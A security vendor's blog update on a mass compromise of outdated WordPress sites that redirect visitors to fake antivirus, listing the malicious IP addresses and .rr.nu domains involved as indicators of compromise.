Latest Mass Compromise of WordPress sites – More Details

We are getting lots of questions about the latest mass compromise targeting WordPress sites (redirecting to fake AV) that has affected over 30,000 domains.

The first question is how are these sites getting hacked? On all the cases we analysed, they either had outdated versions of WordPress, or of a plugin. We can safely rule out any new vulnerability on WordPress itself.

We also posted about it a week ago when we detected this malware campaign using .rr.nu domains.

As we promised in the previous post, this is an update to what we are seeing.

More Details

  • The malicious domains are still pointing to 194.28.114.103 and 194.28.114.102 (same IP’s used by the group behind the sweepstakesandcontestsdo.com and infoitpoweringgathering.com attacks)
  • More than 200 different .rr.nu domains are being used
  • We have identified more than 500 variations of the injected URL to random domains names in the .rr.nu TLD:

If you’re not sure if you’re infected, do a free website malware scan using SiteCheck

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid